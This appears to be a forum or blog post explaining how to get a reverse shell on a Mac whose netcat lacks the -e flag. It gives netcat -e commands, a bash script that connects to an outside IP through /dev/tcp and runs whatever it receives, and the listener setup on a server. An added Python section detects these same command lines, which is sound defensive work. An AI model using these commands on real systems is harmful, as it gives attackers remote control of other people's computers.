On Linux you might have heard of using netcat on the target; it would look something like this.
“nc 127.0.0.1 8080 -e /bin/bash”
Or on Windows.
“nc 127.0.0.1 8080 -e cmd.exe”
However, for unknown reasons (I assume security), Apple’s modified version of netcat does not have a -e flag, but there is a workaround using bash. I do not take credit for this; I just found it with a lucky Google search.
On the target computer, create a file called target.sh.
The file should contain some bash code.
“#!/bin/bash
exec 5<>/dev/tcp/74.125.155.104/8080
cat <&5 | while read line; do $line 2>&5 >&5; done”
Next, open Terminal.app, navigate to the directory where the file is saved, and type:
“chmod +x target.sh”
“./target.sh”
Before you do all this, though, you should have an open connection waiting on a server. Personally I just use an Ubuntu box (you may need to install netcat on your server). From a shell on your server, type:
“netcat -l -p 8080 -vvv”
Here is an example below. The root@freakbox is obviously the server. I also forwarded port 8080 to my server from my router.
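Added example, not part of the original post and not the session mentioned above: seen from the defending side, both the netcat -e form and the bash /dev/tcp script leave recognizable command lines. The sketch below flags them in shell history, process listings, or script files; the function names, rule names, and sample list are assumptions made for this illustration.

```python
import re
import shlex

# bash treats a redirection to /dev/tcp/<host>/<port> as "open a socket"
DEV_TCP = re.compile(r"\d*(?:<>|[<>])&?\s*/dev/(tcp|udp)/([^/\s]+)/(\d+)")
# loop that runs every line it reads as a command, e.g. `while read line; do $line`
READ_EXEC = re.compile(r"while\s+read\s+(?:-r\s+)?(\w+)\s*;\s*do\s+\$\{?\1\b")
NETCAT = {"nc", "ncat", "netcat"}

def classify(cmdline):
    """Return (rule, detail) findings for one command line or script line."""
    findings = [("bash-dev-tcp", f"{m[1]}://{m[2]}:{m[3]}")
                for m in DEV_TCP.finditer(cmdline)]
    findings += [("exec-read-input", m[1]) for m in READ_EXEC.finditer(cmdline)]
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    for i, tok in enumerate(argv):
        if tok.rsplit("/", 1)[-1] not in NETCAT:
            continue
        rest = argv[i + 1:]
        for j, arg in enumerate(rest[:-1]):
            if arg == "-e":     # netcat builds that support -e run the next argument
                findings.append(("netcat-exec", rest[j + 1]))
    return findings

def scan(lines):
    """Return (line_number, rule, detail) for every finding, 1-based."""
    return [(n, rule, detail)
            for n, line in enumerate(lines, 1)
            for rule, detail in classify(line)]

# Constructed sample input: the commands quoted in the post plus one benign line.
SAMPLE = [
    "nc 127.0.0.1 8080 -e /bin/bash",
    "nc 127.0.0.1 8080 -e cmd.exe",
    "exec 5<>/dev/tcp/74.125.155.104/8080",
    "cat <&5 | while read line; do $line 2>&5 >&5; done",
    "netcat -l -p 8080 -vvv",
    "cat /var/log/system.log",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The listener line (netcat -l -p 8080 -vvv) is deliberately not flagged: a listening netcat without -e is common in ordinary troubleshooting, so it is better correlated with other signals than alerted on alone.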



